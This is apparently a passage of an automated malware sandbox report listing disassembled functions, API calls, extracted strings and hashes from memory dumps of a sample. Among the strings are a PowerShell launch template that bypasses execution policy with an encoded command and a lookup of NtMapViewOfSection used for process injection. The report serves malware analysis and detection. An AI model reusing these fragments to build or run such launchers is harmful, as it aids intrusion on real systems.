                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A4E41D
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • malloc.LIBCMT ref: 00A4E43F
                        • _snprintf.LIBCMT ref: 00A4E45A
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • malloc.LIBCMT ref: 00A4E475
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                        • String ID: dpoolWait
                        • API String ID: 2026495703-1875951006
                        • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                        • Instruction ID: a56e08d080d14a2b1a1ef28545ada4ef59e784aceaff782bfcad1907c56b6dc5
                        • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                        • Instruction Fuzzy Hash: B201DE75B01B9081DA04DB12B904719B7A9F7E8FE0F06822AEFA947BC5CF38C0418780
                        Function 00CF31F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: freemallocstrchr$rand
                        • String ID:
                        • API String ID: 1305919620-0
                        • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                        • Instruction ID: 31c52b4e1b38a4b91f7b4411b5774b62390fc80fdfe03ed31eb99e5ced730059
                        • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                        • Instruction Fuzzy Hash: 92614862708FC851EA669F29A4013FAABA0EF95BC4F084125DF8917B65EE3DC347C301
                        Function 00A425F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: freemallocstrchr$rand
                        • String ID:
                        • API String ID: 1305919620-0
                        • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                        • Instruction ID: 652003613a098fd244f1d69123b6e0225d35e89d54ed4cdca683d1c49fe6ae90
                        • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                        • Instruction Fuzzy Hash: 44612966604FC481EA26DB29A5113EAA7A0FFD9BC4F485124EF8917B55EF3DC147C700
                        Function 00CE4170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CE41BD
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE41C8
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • free.LIBCMT ref: 00CE42AF
                        • free.LIBCMT ref: 00CE42B7
                        • free.LIBCMT ref: 00CE42BF
                        • free.LIBCMT ref: 00CE42CB
                        • free.LIBCMT ref: 00CE42D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                        • String ID:
                        • API String ID: 996410232-0
                        • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                        • Instruction ID: 8beb22b2e64b3ed646bb8af13dc27135fc067ea10b42686e62443fa570941f66
                        • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                        • Instruction Fuzzy Hash: D241F3263007D98BDB59DBA7A99036E6750FB49BC0F404525EF6647B15DF38D923C700
                        Function 00A33570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A335BD
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A335C8
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • free.LIBCMT ref: 00A336AF
                        • free.LIBCMT ref: 00A336B7
                        • free.LIBCMT ref: 00A336BF
                        • free.LIBCMT ref: 00A336CB
                        • free.LIBCMT ref: 00A336D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                        • Instruction ID: 89eaaa70b2f41fbf1d0935616a10ba66f13aec733d96db1baeb8e001679bcb93
                        • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                        • Instruction Fuzzy Hash: FC41F123308791AFDF15DF269A6236A6760FB59BC4F544024EF5A4B701EF38DA22C704
                        Function 00CEF274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: htonl$freemalloc
                        • String ID: zyxwvutsrqponmlk
                        • API String ID: 1249573706-3884694604
                        • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                        • Instruction ID: 946d5d0cb5c23db5468426f7a9c2101392ed4665bf58bf2c204d1a47e7855c56
                        • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                        • Instruction Fuzzy Hash: 6B21F66230178846DB54EB76E55133DAA91EB89BD0F044538AF9E8776BEF3CC9079301
                        Function 00CF3FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32 ref: 00CF3FE7
                        • GetProcAddress.KERNEL32 ref: 00CF3FF7
                        • GetLastError.KERNEL32 ref: 00CF40BF
                          • Part of subcall function 00CFCC00: GetCurrentProcess.KERNEL32 ref: 00CFCC8D
                          • Part of subcall function 00CFD134: GetCurrentProcess.KERNEL32 ref: 00CFD161
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                        • String ID: NtMapViewOfSection$ntdll.dll
                        • API String ID: 1006775078-3170647572
                        • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                        • Instruction ID: 564159eeee3ac76b4a36b54eeed900d7c0984679f6e03a1d8432079245371aa7
                        • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                        • Instruction Fuzzy Hash: 2331DE32710B4882EB14EB62E45977A77A0F788BB4F04072AEF6907B95DF7DC5468B00
                        Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: signal
                        • String ID: CCG
                        • API String ID: 1946981877-1584390748
                        • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                        • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                        • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                        • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                        Function 00A4B630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strtok$_getptd_time64malloc
                        • String ID: eThreadpoolTimer
                        • API String ID: 1522986614-2707337283
                        • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                        • Instruction ID: aab378bbd2f5bb49b28fcc4ca7f9c8f9872a78dbb095bb068b350cc617c92290
                        • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                        • Instruction Fuzzy Hash: 0721D3B6A10BE485DB00DF12E18866DB7A8F7D9FE4B1A4626EF5A87781CF34C441C780
                        Function 00CF1FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CF1FD2
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • _snprintf.LIBCMT ref: 00CF1FF1
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • remove.LIBCMT ref: 00CF1FFD
                        • remove.LIBCMT ref: 00CF2004
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                        • String ID: %s\%s
                        • API String ID: 1896346573-4073750446
                        • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                        • Instruction ID: 523190a57e436a7cf21d3df236ec1cdea42779637293abb7bd57914ce42cee6a
                        • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                        • Instruction Fuzzy Hash: B9F0BE36208B8486D340EB52B80137AA360EB88FC0F584135BF8C57B5ACE78C4128755
                        Function 00A413B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A413D2
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • _snprintf.LIBCMT ref: 00A413F1
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • remove.LIBCMT ref: 00A413FD
                        • remove.LIBCMT ref: 00A41404
                        Strings
                        • uld not open process: %d (%u), xrefs: 00A413D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                        • String ID: uld not open process: %d (%u)
                        • API String ID: 2566950902-823969559
                        • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                        • Instruction ID: 24824ce2642e373deb3243d87c0f3a240a986fbea6155a1169621cd329c6a0c0
                        • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                        • Instruction Fuzzy Hash: 7DF0586A609B908AD200EB52B91136AA760FBD8FD0F6C4131FF8917B1ADF38C4518B84
                        Function 00A3DA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _snprintf.LIBCMT ref: 00A3DB25
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                          • Part of subcall function 00A46F38: _snprintf.LIBCMT ref: 00A470A5
                        • _snprintf.LIBCMT ref: 00A3DBBD
                          • Part of subcall function 00A42170: strchr.LIBCMT ref: 00A421D6
                          • Part of subcall function 00A42170: _snprintf.LIBCMT ref: 00A4220C
                          • Part of subcall function 00A4200C: strchr.LIBCMT ref: 00A42069
                          • Part of subcall function 00A4200C: _snprintf.LIBCMT ref: 00A420B3
                        • _snprintf.LIBCMT ref: 00A3DBD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                        • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                        • API String ID: 199363273-1250630670
                        • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                        • Instruction ID: 0ea23a836a3801df021322add84faba297a32a2734943c90e504bac5578d3bb8
                        • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                        • Instruction Fuzzy Hash: B761DB32314B8086EB10DF62E9407AEB7A1F789BD8F884126EE4E57B58DF78C905C740
                        Function 00CF00F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                        • Instruction ID: 9ff6eda95270f2d6c4a05488708a2904a5503ed6e74e2c496ce7e2ae06040419
                        • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                        • Instruction Fuzzy Hash: FC514162B00A4896DF40EB75C4412FD6360FB95BC8F909226EF0E2771AEF38C64AD741
                        Function 00D0062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1640621425-0
                        • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                        • Instruction ID: a1d2303ba67936e096d0aa2eba20f3dca8426ea77545dda8ebc1e60e90eac019
                        • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                        • Instruction Fuzzy Hash: FC312B2130074097DF289E27954436EBA52F7C4FE0F5C82249F9E47BD1DB7CD4918A60
                        Function 00A4FA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1640621425-0
                        • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                        • Instruction ID: 7d200ce09953a15ffe1e03d84557899fb91f4250a3783a1dd5263f4add95d4c5
                        • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                        • Instruction Fuzzy Hash: 8B312A393007408EDE289F27DA5426EB691F7C5FE4F1C96349F6A47B91EB78C8868340
                        Function 00CE54F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CE553A
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE5545
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • free.LIBCMT ref: 00CE562C
                        • free.LIBCMT ref: 00CE5634
                        • free.LIBCMT ref: 00CE5640
                        • free.LIBCMT ref: 00CE564D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                        • String ID:
                        • API String ID: 996410232-0
                        • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                        • Instruction ID: 4f7598e5cd93667dc81e9b3743aeaec4dfb0153b7d257390b9aef767d18ff610
                        • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                        • Instruction Fuzzy Hash: CB312222304BC946DF16DB6B981076A6B59FB95BCCF894035EE668B705EF38CA07C310
                        Function 00A348F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A3493A
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A34945
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • free.LIBCMT ref: 00A34A2C
                        • free.LIBCMT ref: 00A34A34
                        • free.LIBCMT ref: 00A34A40
                        • free.LIBCMT ref: 00A34A4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                        • Instruction ID: 0550d051feff97064164caccb3afb7c1f07435c0bc5a553d8104f98f54d6b570
                        • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                        • Instruction Fuzzy Hash: F43126227187C586DF15DF26A91072EAB99F7A9FC8F1A8030ED598B701EE38D907C705
                        Function 00CF2D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF31F4: strchr.LIBCMT ref: 00CF322E
                          • Part of subcall function 00CF31F4: strchr.LIBCMT ref: 00CF324C
                          • Part of subcall function 00CF31F4: malloc.LIBCMT ref: 00CF3264
                          • Part of subcall function 00CF31F4: malloc.LIBCMT ref: 00CF3271
                          • Part of subcall function 00CF31F4: rand.LIBCMT ref: 00CF333D
                        • strchr.LIBCMT ref: 00CF2DD6
                        • _snprintf.LIBCMT ref: 00CF2E0C
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • _snprintf.LIBCMT ref: 00CF2E23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                        • String ID: %s&%s$?%s
                        • API String ID: 1095232423-1750478248
                        • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                        • Instruction ID: f5027851233bc5b72d8b731af81ea7db61534e885027deef56f1e3f07911d2ef
                        • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                        • Instruction Fuzzy Hash: 11418F66604E8891DA519F2ED1452F8B3B1FF98B95F085522DF4967B20EF34D2B3D340
                        Function 00D0AC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                        • String ID:
                        • API String ID: 2998201375-0
                        • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                        • Instruction ID: f6e8c2369b05f827054c33a638f4308e87967b51e1c2d43f16b7582b737567f0
                        • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                        • Instruction Fuzzy Hash: 6331C1362047818ADB208F19E58076DBBA5FB85FD0F1D4226EB8D57FA5EB38C841C721
                        Function 00A3F064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A3F085
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • free.LIBCMT ref: 00A3F0C0
                        • fwrite.LIBCMT ref: 00A3F101
                        • fclose.LIBCMT ref: 00A3F109
                        • free.LIBCMT ref: 00A3F116
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$free$_callnewhfclosefwritemalloc
                        • String ID:
                        • API String ID: 1696598829-0
                        • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                        • Instruction ID: a28ecd8c874c98ec03a9129b6a2e5b12298987ec2c6419a3f440fd8b53ab90a7
                        • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                        • Instruction Fuzzy Hash: 1F118265B14A4085DE10E722F25126EA391ABD5FE4F484235BF6E4BB8AEF3CC5058741
                        Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                        • GetCurrentProcessId.KERNEL32 ref: 004019E0
                        • GetCurrentThreadId.KERNEL32 ref: 004019E8
                        • GetTickCount.KERNEL32 ref: 004019F0
                        • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
